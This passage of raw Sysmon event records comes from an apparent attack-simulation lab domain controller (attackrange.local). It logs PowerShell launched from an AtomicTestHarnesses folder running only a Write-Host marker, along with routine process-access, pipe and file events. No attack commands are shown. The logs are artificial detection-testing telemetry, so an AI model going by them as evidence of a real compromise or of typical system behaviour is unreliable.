16:51:41.449{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:41.434{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368\PSHost.132591775013416633.9368.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.402{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wmu3d1pb.mry.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.402{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rafqdsfa.da4.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.387{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_rafqdsfa.da4.ps12021-03-02 16:51:41.387 10341000x80000000000000002234879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.371{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.340{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.341{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Co Write-Host 721beadf-d84d-4c5c-be8c-3622898aa9deC:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.320{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.216{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.216{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.168{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.168{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:41.137{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224\PSHost.132591775010452559.10224.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.123{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yjkt0e42.vzf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.123{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3t2urmgx.nqz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.106{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3t2urmgx.nqz.ps12021-03-02 16:51:41.106 10341000x80000000000000002234861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.074{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.043{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D1D-603E-4EAA-00000000AD01}10224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 